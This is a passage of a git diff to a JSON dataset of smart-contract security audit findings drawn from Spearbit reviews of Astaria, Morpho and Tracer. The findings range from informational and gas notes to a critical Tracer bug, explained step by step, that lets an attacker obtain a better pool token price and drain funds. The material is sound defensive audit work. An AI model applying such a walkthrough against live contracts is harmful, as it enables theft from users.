(borrower in this case) and receiver (liquidator) would not be the same address.", + "title": "A redundant if block can be removed from PublicVault._afterCommitToLien", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "In PublicVault._afterCommitToLien, we have the following if block: if (s.last == 0) { s.last = block.timestamp.safeCastTo40(); } This if block is redundant, since regardless of the value of s.last, a few lines before _accrue(s) would update the s.last to the current timestamp.", "labels": [ "Spearbit", - "Morpho", - "Severity: Low Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "_repayERC20ToPool is approving the wrong amount", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", - "body": "_repayERC20ToPool is approving the amount of underlying token specified via the input parameter _amount when the correct amount that should be approved is the one calculated via: _amount = Math.min( _amount, variableDebtToken.scaledBalanceOf(address(this)).mulWadByRay(_normalizedVariableDebt) );", + "title": "Private vaults' deposit endpoints can be potentially simplifed", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "A private vault's deposit function can be called directly or indirectly using the ROUTER() (either way by anyone) and we have the following require statement: require( s.allowList[msg.sender] || (msg.sender == address(ROUTER()) && s.allowList[receiver]) ); If the ROUTER() is the AstariaRouter implementation of IAstariaRouter, then it inherits from ERC4626RouterBase and ERC4626Router which allows anyone to call into deposit of this private vault using: depositToVault depositMax ERC4626RouterBase.deposit Thus if anyone of the above functions is called through the ROUTER(), msg.sender == address(ROUTER() will be true. Also, note that when private vaults are created using the newVault the msg.sender/owner along the delegate are added to the allowList and allowlist is enabled. And since there is no bookkeeping here for the receiver, except only the require statement, that means Only the owner or the delegate of this private vault can call directly into deposit or Anyone else can set the address to parameter of one of those 3 endpoints above to owner or delegate to deposit assets (wETH in the current implementation) into the private vault. And all the assets can be withdrawn by the owner only.", "labels": [ "Spearbit", - "Morpho", - "Severity: Low Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "Possible unbounded loop over enteredMarkets array in _getUserHypotheticalBalanceStates", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", - "body": "PositionsManagerForAaveLogic._getUserHypotheticalBalanceStates is looping enteredMar- kets which could be an unbounded array leading to a reverted transaction caused by a block gas limit. While it is true that Morpho will probably handle a subset of assets controlled by Aave, this loop could still revert because of gas limits for a variety of reasons: In the future Aave could have more assets and Morpho could match 1:1 those assets. Block gas size could decrease. Opcodes could cost more gas.", + "title": "The require statement in decreaseEpochLienCount can be more strict", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "decreaseEpochLienCount has the following require statement that limits who can call into it: require( msg.sender == address(ROUTER()) || msg.sender == address(LIEN_TOKEN()) ); So only, the ROUTER() and LIEN_TOKEN() are allowed to call into. But AstariaRouter never calls into this function.", "labels": [ "Spearbit", - "Morpho", - "Severity: Low Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "Missing parameter validation on setters and event spamming prevention", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", - "body": "User parameter validity should always be verified to prevent contract updates in an inconsistent state. The parameters value should also be different from the old one in order to prevent event spamming (emitting an event when not needed) and improve contract monitoring. contracts/aave/RewardsManagerForAave.sol 20 function setAaveIncentivesController(address _aaveIncentivesController) external override onlyOwner { + + } require(_aaveIncentivesController != address(0), \"param != address(0)\"); require(_aaveIncentivesController != aaveIncentivesController, \"param != prevValue\"); aaveIncentivesController = IAaveIncentivesController(_aaveIncentivesController); emit AaveIncentivesControllerSet(_aaveIncentivesController); contracts/aave/MarketsManagerForAave.sol function setReserveFactor(address _marketAddress, uint16 _newReserveFactor) external onlyOwner { reserveFactor[_marketAddress] = HALF_MAX_BASIS_POINTS <= _newReserveFactor ? HALF_MAX_BASIS_POINTS : _newReserveFactor; updateRates(_marketAddress); emit ReserveFactorSet(_marketAddress, reserveFactor[_marketAddress]); require(_marketAddress != address(0), \"param != address(0)\"); uint16 finalReserveFactor = HALF_MAX_BASIS_POINTS <= _newReserveFactor ? HALF_MAX_BASIS_POINTS : _newReserveFactor; if( finalReserveFactor !== reserveFactor[_marketAddress] ) { reserveFactor[_marketAddress] = finalReserveFactor; emit ReserveFactorSet(_marketAddress, finalReserveFactor); } updateRates(_marketAddress); - - - - - - - + + + + + + + + + + + } function setNoP2P(address _marketAddress, bool _noP2P) external onlyOwner isMarketCreated(_marketAddress) { + } require(_noP2P != noP2P[_marketAddress], \"param != prevValue\"); noP2P[_marketAddress] = _noP2P; emit NoP2PSet(_marketAddress, _noP2P); function updateP2PExchangeRates(address _marketAddress) external override onlyPositionsManager isMarketCreated(_marketAddress) _updateP2PExchangeRates(_marketAddress); + { } 21 function updateSPYs(address _marketAddress) external override onlyPositionsManager isMarketCreated(_marketAddress) _updateSPYs(_marketAddress); + { } contracts/aave/positions-manager-parts/PositionsManagerForAaveGettersSetters.sol function setAaveIncentivesController(address _aaveIncentivesController) external onlyOwner { require(_aaveIncentivesController != address(0), \"param != address(0)\"); require(_aaveIncentivesController != aaveIncentivesController, \"param != prevValue\"); aaveIncentivesController = IAaveIncentivesController(_aaveIncentivesController); emit AaveIncentivesControllerSet(_aaveIncentivesController); + + } Important note: _newNDS min/max value should be accurately validated by the team because this will influence the maximum number of cycles that DDL.insertSorted can do. Setting a value too high would make the transaction fail while setting it too low would make the insertSorted loop exit earlier, resulting in the user being added to the tail of the list. A more detailed issue about the NDS value can be found here: #33 function setNDS(uint8 _newNDS) external onlyOwner { // add a check on `_newNDS` validating correctly max/min value of `_newNDS` require(NDS != _newNDS, \"param != prevValue\"); NDS = _newNDS; emit NDSSet(_newNDS); + + } Important note: _newNDS set to 0 would skip all theMatchingEngineForAave match/unmatch supplier/borrower functions if the user does not specify a custom maxGas A more detailed issue about NDS value can be found here: #34 function setMaxGas(MaxGas memory _maxGas) external onlyOwner { // add a check on `_maxGas` validating correctly max/min value of `_maxGas` // add a check on `_maxGas` internal value checking that at least one of them is different compared to the old version maxGas = _maxGas; emit MaxGasSet(_maxGas); + + ,! } function setTreasuryVault(address _newTreasuryVaultAddress) external onlyOwner { require(_newTreasuryVaultAddress != address(0), \"param != address(0)\"); require(_newTreasuryVaultAddress != treasuryVault, \"param != prevValue\"); treasuryVault = _newTreasuryVaultAddress; emit TreasuryVaultSet(_newTreasuryVaultAddress); + + } function setRewardsManager(address _rewardsManagerAddress) external onlyOwner { require(_rewardsManagerAddress != address(0), \"param != address(0)\"); require(_rewardsManagerAddress != rewardsManager, \"param != prevValue\"); rewardsManager = IRewardsManagerForAave(_rewardsManagerAddress); emit RewardsManagerSet(_rewardsManagerAddress); + + } Important note: Should also check that _poolTokenAddress is currently handled by the PositionsManagerForAave and by the MarketsManagerForAave. Without this check a poolToken could start in a paused state. 22 + function setPauseStatus(address _poolTokenAddress) external onlyOwner { require(_poolTokenAddress != address(0), \"param != address(0)\"); bool newPauseStatus = !paused[_poolTokenAddress]; paused[_poolTokenAddress] = newPauseStatus; emit PauseStatusSet(_poolTokenAddress, newPauseStatus); }", + "title": "amount is not used in _afterCommitToLien", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "amount is not used in _afterCommitToLien to update/decrement s.yIntercept, because even though assets have been transferred out of the vault, they would still need to be paid back and so the net ef- fect on s.yIntercept (that is used in the calculation of the total virtual assets) is 0.", "labels": [ "Spearbit", - "Morpho", - "Severity: Low Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "DDL should prevent inserting items with 0 value", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", - "body": "Currently the DDL library is only checking that the actual value (_list.accounts[_id].value) in the list associated with the _id is 0 to prevent inserting duplicates. The DDL library should also verify that the inserted value is greater than 0. This check would prevent adding users with empty values, which may potentially cause the list and as a result the overall protocol to underperform.", + "title": "Use modifier", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "Highlighted code have require checks on msg.sender which can be converted to modifiers. For instance: require(address(msg.sender) == s.guardian);", "labels": [ "Spearbit", - "Morpho", - "Severity: Low Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "insertSorted iterates more than max iterations parameter", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", - "body": "The insertSorted function iterates _maxIterations + 1 times instead of _maxIterations times.", + "title": "Prefer SafeCastLib for typecasting", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "Highlighted code above does typecasting of several constant values. In case, some value doesn't fit in the type, this typecasting will silently ignore the higher order bits although that's currently not the case, but it may pose a risk if these values are changed in future.", "labels": [ "Spearbit", - "Morpho", - "Severity: Low Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "insertSorted does not behave like a FIFO for same values", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", - "body": "Users that have the same value are inserted into the list before other users with the same value. It does not respect the \"seniority\" of the users order and should behave more like a FIFO queue.", + "title": "Rename Multicall to Multidelegatecall", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "Multicall.sol lets performs multiple delegatecalls. Hence, the name Multicall is not suitable. The contract and the file should be named Multidelegatecall.", "labels": [ "Spearbit", - "Morpho", - "Severity: Low Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "insertSorted inserts elements at wrong index", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", - "body": "The insertSorted function inserts elements after the last element has been insterted, when these should have actually been insterted before the last element. The sort order is therefore wrong, even if the maximum iterations count has not been reached. This is because of the check that the current element is not the tail. if ( ... && current != _list.tail) { insertBefore } else { insertAtEnd } Example: list = [20]. insert(40) then current == list.tail, and is inserted at the back instead of the front. result = [20, 40] list = [30, 10], insert(20) insertion point should be before current == 10, but also current == tail therfore the current != _list.tail condition is false and the element is wrongly inserted at the end. result = [30, 10, 20]", + "title": "safeTransferFrom() without the data argument can be used", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "Highlighted code above sends empty data over an external call via ERC721.safeTransferFrom(from, to, tokenId, data): IERC721(underlyingAsset).safeTransferFrom( address(this), releaseTo, assetId, \"\" ); data can be removed since ERC721.safeTransferFrom(from, to, tokenId) sets empty data too.", "labels": [ "Spearbit", - "Morpho", - "Severity: Low Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "PositionsManagerForAaveLogic gas optimization suggestions", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", - "body": "Update the remainingTo variable only when needed. Inside each function, the remainingTo counter could be moved inside the if statement to avoid calculation when the amount that should be subtracted is >0.", + "title": "Fix documentation that updateVaultAfterLiquidation can be called by LIEN_TOKEN, not ROUTER", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "The function has the correct validation that it can only be called by LIEN_TOKEN(), but the comment says it can only be called by ROUTER(). require(msg.sender == address(LIEN_TOKEN())); // can only be called by router", "labels": [ "Spearbit", - "Morpho", - "Severity: Gas Optimization" + "Astaria", + "Severity: Informational" ] }, { - "title": "MarketsManagerForAave._updateSPYs could store calculations in local variables to save gas", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", - "body": "The calculation in the actual code must be updated following this issue: #36. This current issue is an example on how to avoid an additional SLOAD. The function could store locally currentReserveFactor, newSupplyP2PSPY and newBorrowP2PSPY to avoid addi- tional SLOAD", + "title": "Declare event and constants at the beginning", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "Events and constants are generally declared at the beginning of a smart contract. However, for the highlighted code above, that's not the case.", "labels": [ "Spearbit", - "Morpho", - "Severity: Gas Optimization" + "Astaria", + "Severity: Informational" ] }, { - "title": "Declare variable as immutable/constant and remove unused variables", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", - "body": "Some state variable can be declared as immutable or constant to save gas. Constant variables should be names in uppercase + snake case following the official Solidity style guide. Additionally, variables which are never used across the protocol code can be removed to save gas during deployment and improve readability. RewardsManagerForAave.sol -ILendingPoolAddressesProvider public addressesProvider; -ILendingPool public lendingPool; +ILendingPool public immutable lendingPool; -IPositionsManagerForAave public positionsManager; +IPositionsManagerForAave public immutable positionsManager; SwapManagerUniV2.sol -IUniswapV2Router02 public swapRouter = IUniswapV2Router02(0x60aE616a2155Ee3d9A68541Ba4544862310933d4); // JoeRouter ,! +IUniswapV2Router02 public constant SWAP_ROUTER = ,! IUniswapV2Router02(0x60aE616a2155Ee3d9A68541Ba4544862310933d4); // JoeRouter -IUniswapV2Pair public pair; +IUniswapV2Pair public immutable pair; SwapManagerUniV3.sol 27 -ISwapRouter public swapRouter = ISwapRouter(0xE592427A0AEce92De3Edee1F18E0157C05861564); // The Uniswap V3 router. ,! +ISwapRouter public constant SWAP_ROUTER = ISwapRouter(0xE592427A0AEce92De3Edee1F18E0157C05861564); // ,! The Uniswap V3 router. -address public WETH9; // Intermediate token address. +address public immutable WETH9; // Intermediate token address. -IUniswapV3Pool public pool0; +IUniswapV3Pool public immutable pool0; -IUniswapV3Pool public pool1; +IUniswapV3Pool public immutable pool1; -bool public singlePath; +bool public boolean singlePath; SwapManagerUniV3OnEth.sol -ISwapRouter public swapRouter = ISwapRouter(0xE592427A0AEce92De3Edee1F18E0157C05861564); // The Uniswap V3 router. ,! +ISwapRouter public constant SWAP_ROUTER = ISwapRouter(0xE592427A0AEce92De3Edee1F18E0157C05861564); // ,! The Uniswap V3 router. -IUniswapV3Pool public pool0; +IUniswapV3Pool public immutable pool0; -IUniswapV3Pool public pool1; +IUniswapV3Pool public immutable pool1; -IUniswapV3Pool public pool2; +IUniswapV3Pool public immutable pool2;", + "title": "Rename Vault to PrivateVault", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "Vault contract is used to represent private vaults.", "labels": [ "Spearbit", - "Morpho", - "Severity: Gas Optimization" + "Astaria", + "Severity: Informational" ] }, { - "title": "Function does not revert if balance to transfer is zero", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", - "body": "Currently when the claimToTreasury() function is called it gets the amountToClaim by using un- derlyingToken.balanceOf(address(this). It then uses this amountToClaim in the safeTransfer() function and the ReserveFeeClaimed event is emitted. The problem is that the function does not take into account that it is possible for the amountToClaim to be 0. In this case the safeTransfer function would still be called and the ReserveFeeClaimed event would still be emitted unnecessarily.", + "title": "Remove comment", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "Comment at line WithdrawProxy.sol#L229 can be removed: if ( block.timestamp < s.finalAuctionEnd // || s.finalAuctionEnd == uint256(0) ) { The condition in comments is always false as the code already reverts in that case.", "labels": [ "Spearbit", - "Morpho", - "Severity: Gas Optimization" + "Astaria", + "Severity: Informational" ] }, { - "title": "matchingEngine should be initialized in PositionsManagerForAaveLogics initialize function", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", - "body": "MatchingEngineForAave inherits from PositionsManagerForAaveStorage which is an UUPSUp- gradeable contract. Following UUPS best practices, should also be initialized. the MatchingEngineForAave deployed by PositionsManagerForAaveLogic", + "title": "WithdrawProxy and PrivateVault symbols are missing hyphens", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "The symbol for the WithdrawProxy token is missing a hyphen after the W, which will make the name AST-W0x... instead of AST-W-0x.... Similarly, the symbol for the Private Vault token (in Vault.sol) is missing a hyphen after the V.", "labels": [ "Spearbit", - "Morpho", + "Astaria", "Severity: Informational" ] }, { - "title": "Misc: notation, style guide, global unit types, etc", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", - "body": "Follow solidity notation, standard style guide and global unit types to improve readability.", + "title": "Lien cannot be bought out after stack.point.end", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "The _getRemainingInterest function reverts with Panic(0x11) when block.timestamp > stack.point.end.", "labels": [ "Spearbit", - "Morpho", + "Astaria", "Severity: Informational" ] }, { - "title": "Outdated or wrong Natspec documentation", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", - "body": "Some Natspec documentation is missing parameters/return value or is not correctly updated to reflect the function code.", + "title": "Inconsistent strictness of inequalities in isValidRefinance", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "In isValidRefinance, we check that either: a) newRate < maxNewRate && newEnd >= oldEnd b) newEnd - oldEnd >= minDurationIncrease && newRate <= oldRate We should be consistent in whether we're enforcing the changes are strict inequalities or non-strict inequalities.", "labels": [ "Spearbit", - "Morpho", + "Astaria", "Severity: Informational" ] }, { - "title": "Use the official UniswapV3 0.8 branch", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", - "body": "The current repository creates local copies of the UniswapV3 codebase and manually migrates the contracts to Solidity 0.8.", + "title": "Clarify comments", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "Few comments are not clear on what they are referring to: zone: address(this), // 0x20 ... conduitKey: s.CONDUIT_KEY, // 0x120", "labels": [ "Spearbit", - "Morpho", + "Astaria", "Severity: Informational" ] }, { - "title": "Unused events and unindexed event parameters", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", - "body": "Certain parameters should be defined as indexed to track them from web3 applications / security monitoring tools.", + "title": "Remove unused files", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "CallUtils.sol is not used anywhere in the codebase.", "labels": [ "Spearbit", - "Morpho", + "Astaria", "Severity: Informational" ] }, { - "title": "Rewards are ignored in the on-pool rate computation", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", - "body": "Morpho claims that the protocol is a strict improvement upon the underlying lending protocols. It tries to match as many suppliers and borrowers P2P at the supply/borrow mid-rate of the underlying protocol. However, given high reward incentives paid out to on-pool users it could be the case that being on the pool yields a better rate than the P2P rate.", + "title": "Document privileges and entities holding these privileges", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "There are certain privileged functionalities in the codebase (recognized through requiresAuth mod- ifier). Currently, we have to refer to tests to identify the setup.", "labels": [ "Spearbit", - "Morpho", + "Astaria", "Severity: Informational" ] }, { - "title": "Pool token price is incorrect when there is more than one pending upkeep", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "The amount of pool tokens to mint and quote tokens to burn is determined by the pool token price. This price, for a commit at update interval ID X, should not be influenced by any pending commits for IDs greater than X. However, in the current implementation price includes the current total supply but burn commits burn pool tokens immediately when commit() is called, not when upkeep() is executed. // pool token price computation at execution of updateIntervalId, example for long price priceHistory[updateIntervalId].longPrice = longBalance / (IERC20(tokens[LONG_INDEX]).totalSupply() + _totalCommit[updateIntervalId].longBurnAmount + _totalCommit[updateIntervalId].longBurnShortMintAmount) ,! The implementation tries to fix this by adding back all tokens burned at this updateIntervalId but it must also add back all tokens that were burned in future commits (i.e. when ID > updateIntervalID). This issue allows an attacker to get a better pool token price and steal pool token funds. Example: Given the preconditions: long.totalSupply() = 2000 User owns 1000 long pool tokens lastPriceTimestamp = 100 updateInterval = 10 frontRunningInterval = 5 At time 104: User commits to BurnLong 500 tokens in appropriateUpdateIntervalId = 5. Upon execution user receives a long price of longBalance / (1500 + 500) if no further future commitments are made. Then, as tokens are burned totalPoolCommitments[5].longBurnAmount = 500 and long.totalSupply -= 500. time 106: At 6 as they are now past totalPoolCommitments[6].longBurnAmount = 500, long.totalSupply -= 500 again as tokens are burned. User commits another 500 tokens to BurnLong at appropriateUpdateIntervalId = Now the frontRunningInterval and are scheduled for the next update. the 5th update interval Finally, (IERC20(tokens[LONG_INDEX]).totalSupply() + _totalCommit[5].longBurnAmount + _totalCom- mit[5].longBurnShortMintAmount = longBalance / (1000 + 500) which is a better price than what the user should have received. ID is executed by the pool keeper but at longPrice = longBalance / With a longBalance of 2000, the user receives 500 * (2000 / 1500) = 666.67 tokens executing the first burn commit and 500 * ((2000 - 666.67) / 1500) = 444.43 tokens executing the second one. 5 The total pool balance received by the user is 1111.1/2000 = 55.555% by burning only 1000 / 2000 = 50% of the pool token supply.", + "title": "Document and ensure that maximum number of liens should not be set greater than 256", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "Maximum number of liens in a stack is currently set to 5. While paying for a lien, the index in the stack is casted to uint8. This makes the implicit limit on maximum number of liens to be 256.", "labels": [ "Spearbit", - "Tracer", - "Severity: Critical" + "Astaria", + "Severity: Informational" ] }, { - "title": "No price scaling in SMAOracle", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "The update() function of the SMAOracle contract doesnt scale the latestPrice although a scaler is set in the constructor. On the other hand, the _latestRoundData() function of ChainlinkOracleWrapper contract does scale via toWad(). contract SMAOracle is IOracleWrapper { constructor(..., uint256 _spotDecimals, ...) { ... require(_spotDecimals <= MAX_DECIMALS, \"SMA: Decimal precision too high\"); ... /* `scaler` is always <= 10^18 and >= 1 so this cast is safe */ scaler = int256(10**(MAX_DECIMALS - _spotDecimals)); ... } function update() internal returns (int256) { /* query the underlying spot price oracle */ IOracleWrapper spotOracle = IOracleWrapper(oracle); int256 latestPrice = spotOracle.getPrice(); ... priceObserver.add(latestPrice); // doesn't scale latestPrice ... } contract ChainlinkOracleWrapper is IOracleWrapper { function getPrice() external view override returns (int256) { (int256 _price, ) = _latestRoundData(); return _price; } function _latestRoundData() internal view returns (int256, uint80) { (..., int256 price, ..) = AggregatorV2V3Interface(oracle).latestRoundData(); ... return (toWad(price), ...); }", + "title": "transferWithdrawReserve() can return early when the current epoch is 0", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "If s.currentEpoch == 0, s.currentEpoch - 1 will wrap around to type(uint256).max and we will most probably will drain assets into address(0) in the following block: unchecked { s.withdrawReserve -= WithdrawProxy(withdrawProxy) .drain( s.withdrawReserve, s.epochData[s.currentEpoch - 1].withdrawProxy ) .safeCastTo88(); } But this cannot happen since in the outer if block the condition s.withdrawReserve > 0 indirectly means that s.currentEpoch > 0. The indirect implication above regarding the 2 conditions stems from the fact that s.withdrawReserve has only been set in transferWithdrawReserve() function or processEpoch(). In transferWithdrawReserve() function 78 it assumes a positive value only when s.currentEpoch > uint64(0) and in processEpoch() at the end we are incrementing s.currentEpoch.", "labels": [ "Spearbit", - "Tracer", - "Severity: High Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "Two different invariantCheck variables used in PoolFactory.deployPool()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "The deployPool() function in the PoolFactory contract uses two different invariantCheck vari- ables: the one defined as a contracts instance variable and the one supplied as a parameter. Note: This was also documented in Secureums CARE-X report issue \"Invariant check incorrectly fixed\". function deployPool(PoolDeployment calldata deploymentParameters) external override returns (address) { ... poolCommitter.initialize(..., ,! invariantCheck deploymentParameters.invariantCheck, ... ); // version 1 of ... ILeveragedPool.Initialization memory initialization = ILeveragedPool.Initialization({ ... _invariantCheckContract: invariantCheck, // version 2 of invariantCheck ... });", + "title": "2 of the inner if blocks of processEpoch() check for a condition that has already been checked by an outer if block", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "The following 2 if block checks are redundant: if (address(currentWithdrawProxy) != address(0)) { currentWithdrawProxy.setWithdrawRatio(s.liquidationWithdrawRatio); } uint256 expected = 0; if (address(currentWithdrawProxy) != address(0)) { expected = currentWithdrawProxy.getExpected(); } Since the condition address(currentWithdrawProxy) != address(0) has already been checked by an outer if block.", "labels": [ "Spearbit", - "Tracer", - "Severity: High Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "Duplicate user payments for long commits when paid from balance", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "When minting pool tokens in commit(), the fromAggregateBalance parameter indicates if the user wants to pay from their internal balances or by transferring the tokens. The second if condition is wrong and leads to users having to pay twice when calling commit() with CommitType.LongMint and fromAggregateBalance = true.", + "title": "General formatting suggestions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": " PublicVault.sol#L283 : there are extra sourounding paranthesis", "labels": [ "Spearbit", - "Tracer", - "Severity: High Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "Initial executionPrice is too high", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "When a pool is deployed the initial executionPrice is calculated as firstPrice * 1e18 where firstPrice is ILeveragedPool(_poolAddress).getOraclePrice(): contract PoolKeeper is IPoolKeeper, Ownable { function newPool(address _poolAddress) external override onlyFactory { int256 firstPrice = ILeveragedPool(_poolAddress).getOraclePrice(); int256 startingPrice = ABDKMathQuad.toInt(ABDKMathQuad.mul(ABDKMathQuad.fromInt(firstPrice), ,! FIXED_POINT)); executionPrice[_poolAddress] = startingPrice; } } All other updates to executionPrice use the result of getPriceAndMetadata() directly without scaling: function performUpkeepSinglePool() { ... (int256 latestPrice, ...) = pool.getUpkeepInformation(); ... executionPrice[_pool] = latestPrice; ... } contract LeveragedPool is ILeveragedPool, Initializable, IPausable { function getUpkeepInformation() { (int256 _latestPrice, ...) = IOracleWrapper(oracleWrapper).getPriceAndMetadata(); return (_latestPrice, ...); } } The price after the firstPrice will always be lower, therefore its funding rate payment will always go to the shorts and long pool token holders will incur a loss.", + "title": "Identical collateral check is performed twice in _createLien", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "In _createLien, a check is performed that the collateralId of the new lien matches the collateralId of the first lien on the stack. if (params.stack.length > 0) { if (params.lien.collateralId != params.stack[0].lien.collateralId) { revert InvalidState(InvalidStates.COLLATERAL_MISMATCH); } } This identical check is performed twice (L383-387 and L389-393).", "labels": [ "Spearbit", - "Tracer", - "Severity: High Risk" + "Astaria", + "Severity: Informational" ] }, { - "title": "Paused state cant be set and therefore withdrawQuote() cant be executed", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "The checkInvariants() function of the InvariantCheck contract is called via the modifiers check- InvariantsBeforeFunction() and checkInvariantsAfterFunction() of both LeveragedPool and PoolCommit- ter contracts, and it is meant to pause the contracts if the invariant checks dont hold. The aforementioned modifiers also contain the require(!paused, \"Pool is paused\"); statement, which reverts the entire transaction and resets the paused variable that was just set. Furthermore, the paused state can only be set by the InvariantCheck contract due to the onlyInvariantCheck- Contract modifier. Thus the paused variable will never be set to true, making withdrawQuote() impossible to be executed because it requires the contract to be paused. This means that the quote tokens will always stay in the pool even if invariants dont hold and all other actions are blocked. Relevant parts of the code: The checkInvariants() function calls InvariantCheck.pause() if the invariants dont hold. The latter calls pause() in LeveragedPool and PoolCommitter: contract InvariantCheck is IInvariantCheck { function checkInvariants(address poolToCheck) external override { ... pause(IPausable(poolToCheck), IPausable(address(poolCommitter))); ... } function pause(IPausable pool, IPausable poolCommitter) internal { pool.pause(); poolCommitter.pause(); } } In LeveragedPool and PoolCommitter contracts, the checkInvariantsBeforeFunction() and checkIn- variantsAfterFunction() modifiers will make the transaction revert if checkInvariants() sets the paused state. contract LeveragedPool is ILeveragedPool, Initializable, IPausable { modifier checkInvariantsBeforeFunction() { invariantCheck.checkInvariants(address(this)); // can set paused to true require(!paused, \"Pool is paused\"); // will reset pause again _; } modifier checkInvariantsAfterFunction() { require(!paused, \"Pool is paused\"); _; invariantCheck.checkInvariants(address(this)); // can set paused to true require(!paused, \"Pool is paused\"); // will reset pause again } function pause() external override onlyInvariantCheckContract { // can only called from InvariantCheck paused = true; emit Paused(); } ,! } 9 contract PoolCommitter is IPoolCommitter, Initializable { modifier checkInvariantsBeforeFunction() { invariantCheck.checkInvariants(leveragedPool); // can set paused to true require(!paused, \"Pool is paused\"); // will reset pause again _; } modifier checkInvariantsAfterFunction() { require(!paused, \"Pool is paused\"); _; invariantCheck.checkInvariants(leveragedPool); // can set paused to true require(!paused, \"Pool is paused\"); // will reset pause again } function pause() external onlyInvariantCheckContract { // can only called from InvariantCheck paused = true; emit Paused(); }", + "title": "checkAllowlistAndDepositCap modifer can be defined to consolidate some of the mint and deposit logic for public vaults", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "The following code snippet has been used for both mint and deposit endpoints of a 